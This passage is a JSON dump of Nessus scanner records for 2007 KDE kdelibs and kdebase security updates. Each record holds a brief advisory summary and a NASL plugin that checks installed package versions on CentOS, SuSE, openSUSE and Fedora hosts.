Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdelibs package provides libraries for the K Desktop Environment\n(KDE).\n\nTwo cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.", "edition": 28, "published": "2007-10-12T00:00:00", "title": "CentOS 4 / 5 : kdelibs (CESA-2007:0909)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0242", "CVE-2007-4224", "CVE-2007-3820", "CVE-2007-1564", "CVE-2007-0537", "CVE-2007-1308"], "modified": "2007-10-12T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kdelibs", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:kdelibs-devel", "p-cpe:/a:centos:centos:kdelibs-apidocs", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2007-0909.NASL", "href": "https://www.tenable.com/plugins/nessus/26974", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0909 and \n# CentOS Errata and Security Advisory 2007:0909 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26974);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-0242\", \"CVE-2007-0537\", \"CVE-2007-1308\", \"CVE-2007-1564\", \"CVE-2007-3820\", \"CVE-2007-4224\");\n script_xref(name:\"RHSA\", value:\"2007:0909\");\n\n script_name(english:\"CentOS 4 / 5 : kdelibs (CESA-2007:0909)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kdelibs packages that resolve several security flaws are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdelibs package provides libraries for the K Desktop Environment\n(KDE).\n\nTwo cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014284.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4576e16d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014292.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?daa3b324\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014293.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9fce9c47\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014300.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cb2b04c0\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014301.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7d8637c9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(59, 79, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"kdelibs-3.3.1-9.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"kdelibs-devel-3.3.1-9.el4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"kdelibs-3.5.4-13.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kdelibs-apidocs-3.5.4-13.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kdelibs-devel-3.5.4-13.el5.centos\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:31:35", "description": "A bug in konqueror allowed attackers to abuse the FTP passive mode for\nportscans. (CVE-2007-1564)", "edition": 22, "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : kdelibs3,kdelibs3-devel,CVE-2007-1564 (ZYPP Patch Number 3988)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1564"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KDELIBS3-3988.NASL", "href": "https://www.tenable.com/plugins/nessus/29483", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29483);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:30\");\n\n script_cve_id(\"CVE-2007-1564\");\n\n script_name(english:\"SuSE 10 Security Update : kdelibs3,kdelibs3-devel,CVE-2007-1564 (ZYPP Patch Number 3988)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in konqueror allowed attackers to abuse the FTP passive mode for\nportscans. (CVE-2007-1564)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-1564.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 3988.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"kdelibs3-3.5.1-49.38\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"kdelibs3-devel-3.5.1-49.38\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.38\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"kdelibs3-3.5.1-49.38\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"kdelibs3-devel-3.5.1-49.38\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.38\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:31:35", "description": "A bug in KHTML could be exploited to conduct cross site scripting\n(XSS) attacks (CVE-2007-0537).\n\nAnother bug allowed attackers to abuse the FTP passive mode for\nportscans (CVE-2007-1564).", "edition": 23, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : kdelibs3 (kdelibs3-3058)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1564", "CVE-2007-0537"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kdelibs3-32bit", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:kdelibs3", "p-cpe:/a:novell:opensuse:kdelibs3-devel", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_KDELIBS3-3058.NASL", "href": "https://www.tenable.com/plugins/nessus/27289", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kdelibs3-3058.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27289);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:30\");\n\n script_cve_id(\"CVE-2007-0537\", \"CVE-2007-1564\");\n\n script_name(english:\"openSUSE 10 Security Update : kdelibs3 (kdelibs3-3058)\");\n script_summary(english:\"Check for the kdelibs3-3058 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in KHTML could be exploited to conduct cross site scripting\n(XSS) attacks (CVE-2007-0537).\n\nAnother bug allowed attackers to abuse the FTP passive mode for\nportscans (CVE-2007-1564).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kdelibs3-3.5.1-49.18.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kdelibs3-devel-3.5.1-49.18.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.18.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kdelibs3-3.5.5-45.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kdelibs3-devel-3.5.5-45.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.5-45.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs3 / kdelibs3-32bit / kdelibs3-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:31:35", "description": "A bug in KHTML could be exploited to conduct cross site scripting\n(XSS) attacks. (CVE-2007-0537)\n\nAnother bug allowed attackers to abuse the FTP passive mode for\nportscans. (CVE-2007-1564)", "edition": 22, "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : kdelibs3 (ZYPP Patch Number 3053)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1564", "CVE-2007-0537"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KDELIBS3-3053.NASL", "href": "https://www.tenable.com/plugins/nessus/29482", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29482);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:30\");\n\n script_cve_id(\"CVE-2007-0537\", \"CVE-2007-1564\");\n\n script_name(english:\"SuSE 10 Security Update : kdelibs3 (ZYPP Patch Number 3053)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in KHTML could be exploited to conduct cross site scripting\n(XSS) attacks. (CVE-2007-0537)\n\nAnother bug allowed attackers to abuse the FTP passive mode for\nportscans. (CVE-2007-1564)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0537.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-1564.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 3053.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"kdelibs3-3.5.1-49.18.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"kdelibs3-devel-3.5.1-49.18.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.18.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"kdelibs3-3.5.1-49.18.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"kdelibs3-devel-3.5.1-49.18.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.18.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:06:04", "description": "This update primarily addresses security issues around URL spoofing.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-11-06T00:00:00", "title": "Fedora 7 : kdebase-3.5.7-13.fc7 (2007-1700)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "modified": "2007-11-06T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:kdebase-devel", "p-cpe:/a:fedoraproject:fedora:kdebase-debuginfo", "p-cpe:/a:fedoraproject:fedora:kdebase", "p-cpe:/a:fedoraproject:fedora:kdebase-extras"], "id": "FEDORA_2007-1700.NASL", "href": "https://www.tenable.com/plugins/nessus/27729", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-1700.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27729);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-3820\", \"CVE-2007-4224\", \"CVE-2007-4225\");\n script_xref(name:\"FEDORA\", value:\"2007-1700\");\n\n script_name(english:\"Fedora 7 : kdebase-3.5.7-13.fc7 (2007-1700)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update primarily addresses security issues around URL spoofing.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-August/003346.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?438842df\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdebase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdebase-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdebase-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdebase-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"kdebase-3.5.7-13.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"kdebase-debuginfo-3.5.7-13.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"kdebase-devel-3.5.7-13.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"kdebase-extras-3.5.7-13.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdebase / kdebase-debuginfo / kdebase-devel / kdebase-extras\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:06:04", "description": "This update primarily addresses problems with URL spoofing and\nconsolekit/session permissions.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-11-06T00:00:00", "title": "Fedora 7 : kdelibs-3.5.7-20.fc7 (2007-1699)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "modified": "2007-11-06T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:kdelibs-debuginfo", "p-cpe:/a:fedoraproject:fedora:kdelibs", "p-cpe:/a:fedoraproject:fedora:kdelibs-devel", "p-cpe:/a:fedoraproject:fedora:kdelibs-apidocs"], "id": "FEDORA_2007-1699.NASL", "href": "https://www.tenable.com/plugins/nessus/27728", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-1699.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27728);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-3820\", \"CVE-2007-4224\", \"CVE-2007-4225\");\n script_xref(name:\"FEDORA\", value:\"2007-1699\");\n\n script_name(english:\"Fedora 7 : kdelibs-3.5.7-20.fc7 (2007-1699)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update primarily addresses problems with URL spoofing and\nconsolekit/session permissions.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-August/003345.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c76a6e38\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 